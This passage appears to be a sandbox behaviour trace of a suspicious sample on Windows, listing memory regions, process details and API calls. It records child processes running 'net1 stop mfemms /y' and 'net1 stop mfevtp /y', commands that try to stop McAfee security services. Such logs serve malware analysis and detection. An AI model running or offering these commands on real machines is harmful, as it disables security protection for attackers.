= 6469 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6470 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6471 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6472 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 6473 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6474 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 567 os_tid = 0x1208 Process: id = "146" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x60929000" os_pid = "0x1224" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "137" os_parent_pid = "0xd70" cmd_line = "C:\\Windows\\system32\\net1 stop mfemms /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6475 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6476 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6477 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6478 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 6479 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6480 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6481 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6482 start_va = 0xffae0000 end_va = 0xffb12fff entry_point = 0xffae0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6483 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6484 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6485 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6486 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6487 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 6488 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6489 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6490 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6491 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6492 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6493 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6494 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 6495 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6496 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6497 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6498 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6499 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6500 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6501 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6502 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6503 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6504 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6505 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6506 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6507 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6508 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6509 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6510 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6511 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6512 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6566 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 569 os_tid = 0x1238 [0099.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb10 | out: lpSystemTimeAsFileTime=0x18fb10*(dwLowDateTime=0xf0b60810, dwHighDateTime=0x1d48689)) [0099.898] GetCurrentProcessId () returned 0x1224 [0099.898] GetCurrentThreadId () returned 0x1238 [0099.898] GetTickCount () returned 0x22c1e [0099.898] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb18 | out: lpPerformanceCount=0x18fb18*=1814681600000) returned 1 [0099.900] GetModuleHandleW (lpModuleName=0x0) returned 0xffae0000 [0099.900] __set_app_type (_Type=0x1) [0099.900] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffaf9c9c) returned 0x0 [0099.900] __getmainargs (in: _Argc=0xffb04780, _Argv=0xffb04790, _Env=0xffb04788, _DoWildCard=0, _StartInfo=0xffb0479c | out: _Argc=0xffb04780, _Argv=0xffb04790, _Env=0xffb04788) returned 0 [0099.900] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.900] GetConsoleOutputCP () returned 0x1b5 [0100.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb0cec0 | out: lpCPInfo=0xffb0cec0) returned 1 [0100.023] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.025] sprintf_s (in: _DstBuf=0x18fab8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0100.026] setlocale (category=0, locale=".437") returned="English_United States.437" [0100.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.027] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.027] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfemms /y" [0100.027] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f850, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0100.028] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0100.028] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18faa8 | out: Buffer=0x18faa8*=0x294d40) returned 0x0 [0100.028] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18faa8 | out: Buffer=0x18faa8*=0x29c0e0) returned 0x0 [0100.028] _fileno (_File=0x7fefdba2a80) returned 0 [0100.028] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0100.028] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0100.028] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0100.028] _wcsicmp (_String1="config", _String2="stop") returned -16 [0100.028] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0100.028] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0100.028] _wcsicmp (_String1="file", _String2="stop") returned -13 [0100.029] _wcsicmp (_String1="files", _String2="stop") returned -13 [0100.029] _wcsicmp (_String1="group", _String2="stop") returned -12 [0100.029] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0100.029] _wcsicmp (_String1="help", _String2="stop") returned -11 [0100.029] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0100.029] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0100.029] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0100.029] _wcsicmp (_String1="session", _String2="stop") returned -15 [0100.029] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0100.029] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0100.029] _wcsicmp (_String1="share", _String2="stop") returned -12 [0100.029] _wcsicmp (_String1="start", _String2="stop") returned -14 [0100.029] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0100.029] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0100.029] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0100.029] _wcsicmp (_String1="accounts", _String2="mfemms") returned -12 [0100.029] _wcsicmp (_String1="computer", _String2="mfemms") returned -10 [0100.029] _wcsicmp (_String1="config", _String2="mfemms") returned -10 [0100.029] _wcsicmp (_String1="continue", _String2="mfemms") returned -10 [0100.029] _wcsicmp (_String1="cont", _String2="mfemms") returned -10 [0100.030] _wcsicmp (_String1="file", _String2="mfemms") returned -7 [0100.030] _wcsicmp (_String1="files", _String2="mfemms") returned -7 [0100.030] _wcsicmp (_String1="group", _String2="mfemms") returned -6 [0100.030] _wcsicmp (_String1="groups", _String2="mfemms") returned -6 [0100.030] _wcsicmp (_String1="help", _String2="mfemms") returned -5 [0100.030] _wcsicmp (_String1="helpmsg", _String2="mfemms") returned -5 [0100.030] _wcsicmp (_String1="localgroup", _String2="mfemms") returned -1 [0100.030] _wcsicmp (_String1="pause", _String2="mfemms") returned 3 [0100.030] _wcsicmp (_String1="session", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="sessions", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="sess", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="share", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="start", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="stats", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="statistics", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="stop", _String2="mfemms") returned 6 [0100.030] _wcsicmp (_String1="time", _String2="mfemms") returned 7 [0100.030] _wcsicmp (_String1="user", _String2="mfemms") returned 8 [0100.030] _wcsicmp (_String1="users", _String2="mfemms") returned 8 [0100.030] _wcsicmp (_String1="msg", _String2="mfemms") returned 13 [0100.030] _wcsicmp (_String1="messenger", _String2="mfemms") returned -1 [0100.031] _wcsicmp (_String1="receiver", _String2="mfemms") returned 5 [0100.031] _wcsicmp (_String1="rcv", _String2="mfemms") returned 5 [0100.031] _wcsicmp (_String1="netpopup", _String2="mfemms") returned 1 [0100.031] _wcsicmp (_String1="redirector", _String2="mfemms") returned 5 [0100.031] _wcsicmp (_String1="redir", _String2="mfemms") returned 5 [0100.031] _wcsicmp (_String1="rdr", _String2="mfemms") returned 5 [0100.031] _wcsicmp (_String1="workstation", _String2="mfemms") returned 10 [0100.031] _wcsicmp (_String1="work", _String2="mfemms") returned 10 [0100.031] _wcsicmp (_String1="wksta", _String2="mfemms") returned 10 [0100.031] _wcsicmp (_String1="prdr", _String2="mfemms") returned 3 [0100.031] _wcsicmp (_String1="devrdr", _String2="mfemms") returned -9 [0100.031] _wcsicmp (_String1="lanmanworkstation", _String2="mfemms") returned -1 [0100.031] _wcsicmp (_String1="server", _String2="mfemms") returned 6 [0100.031] _wcsicmp (_String1="svr", _String2="mfemms") returned 6 [0100.031] _wcsicmp (_String1="srv", _String2="mfemms") returned 6 [0100.031] _wcsicmp (_String1="lanmanserver", _String2="mfemms") returned -1 [0100.031] _wcsicmp (_String1="alerter", _String2="mfemms") returned -12 [0100.031] _wcsicmp (_String1="netlogon", _String2="mfemms") returned 1 [0100.031] _wcsupr (in: _String="mfemms" | out: _String="MFEMMS") returned="MFEMMS" [0100.032] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x29c900 [0100.035] GetServiceKeyNameW (in: hSCManager=0x29c900, lpDisplayName="MFEMMS", lpServiceName=0xffb05750, lpcchBuffer=0x18f9c8 | out: lpServiceName="", lpcchBuffer=0x18f9c8) returned 0 [0100.037] _wcsicmp (_String1="msg", _String2="MFEMMS") returned 13 [0100.037] _wcsicmp (_String1="messenger", _String2="MFEMMS") returned -1 [0100.037] _wcsicmp (_String1="receiver", _String2="MFEMMS") returned 5 [0100.037] _wcsicmp (_String1="rcv", _String2="MFEMMS") returned 5 [0100.037] _wcsicmp (_String1="redirector", _String2="MFEMMS") returned 5 [0100.037] _wcsicmp (_String1="redir", _String2="MFEMMS") returned 5 [0100.037] _wcsicmp (_String1="rdr", _String2="MFEMMS") returned 5 [0100.037] _wcsicmp (_String1="workstation", _String2="MFEMMS") returned 10 [0100.037] _wcsicmp (_String1="work", _String2="MFEMMS") returned 10 [0100.037] _wcsicmp (_String1="wksta", _String2="MFEMMS") returned 10 [0100.037] _wcsicmp (_String1="prdr", _String2="MFEMMS") returned 3 [0100.037] _wcsicmp (_String1="devrdr", _String2="MFEMMS") returned -9 [0100.037] _wcsicmp (_String1="lanmanworkstation", _String2="MFEMMS") returned -1 [0100.037] _wcsicmp (_String1="server", _String2="MFEMMS") returned 6 [0100.037] _wcsicmp (_String1="svr", _String2="MFEMMS") returned 6 [0100.037] _wcsicmp (_String1="srv", _String2="MFEMMS") returned 6 [0100.037] _wcsicmp (_String1="lanmanserver", _String2="MFEMMS") returned -1 [0100.037] _wcsicmp (_String1="alerter", _String2="MFEMMS") returned -12 [0100.038] _wcsicmp (_String1="netlogon", _String2="MFEMMS") returned 1 [0100.038] NetServiceControl (in: servername=0x0, service="MFEMMS", opcode=0x0, arg=0x0, bufptr=0x18f9d0 | out: bufptr=0x18f9d0) returned 0x889 [0100.038] wcscpy_s (in: _Destination=0xffb080d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0100.038] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0100.039] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb05b50, nSize=0x800, Arguments=0xffb07f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0100.041] GetFileType (hFile=0xb) returned 0x2 [0100.041] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f898 | out: lpMode=0x18f898) returned 1 [0100.041] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb05b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f890, lpReserved=0x0 | out: lpBuffer=0xffb05b50*, lpNumberOfCharsWritten=0x18f890*=0x1e) returned 1 [0100.042] GetFileType (hFile=0xb) returned 0x2 [0100.042] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f898 | out: lpMode=0x18f898) returned 1 [0100.042] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffae1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f890, lpReserved=0x0 | out: lpBuffer=0xffae1efc*, lpNumberOfCharsWritten=0x18f890*=0x2) returned 1 [0100.043] _ultow (in: _Dest=0x889, _Radix=1636608 | out: _Dest=0x889) returned="2185" [0100.043] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb05b50, nSize=0x800, Arguments=0xffb07f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0100.043] GetFileType (hFile=0xb) returned 0x2 [0100.043] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f898 | out: lpMode=0x18f898) returned 1 [0100.043] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb05b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f890, lpReserved=0x0 | out: lpBuffer=0xffb05b50*, lpNumberOfCharsWritten=0x18f890*=0x34) returned 1 [0100.044] GetFileType (hFile=0xb) returned 0x2 [0100.044] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f898 | out: lpMode=0x18f898) returned 1 [0100.044] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffae1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f890, lpReserved=0x0 | out: lpBuffer=0xffae1efc*, lpNumberOfCharsWritten=0x18f890*=0x2) returned 1 [0100.045] NetApiBufferFree (Buffer=0x294d40) returned 0x0 [0100.045] NetApiBufferFree (Buffer=0x29c0e0) returned 0x0 [0100.045] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfemms /y" [0100.045] exit (_Code=2) Process: id = "147" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x56474000" os_pid = "0x1220" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "141" os_parent_pid = "0x10b8" cmd_line = "C:\\Windows\\system32\\net1 stop mfevtp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6513 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6514 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6515 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6516 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6517 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6518 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6519 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6520 start_va = 0xffae0000 end_va = 0xffb12fff entry_point = 0xffae0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6521 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6522 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6523 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 6524 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6525 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 6526 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6527 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6528 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6529 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6530 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6531 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 6532 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6533 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6534 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6535 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6536 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6537 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6538 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6539 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6540 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6541 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6542 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6543 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6544 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6545 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6546 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6547 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6548 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6549 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 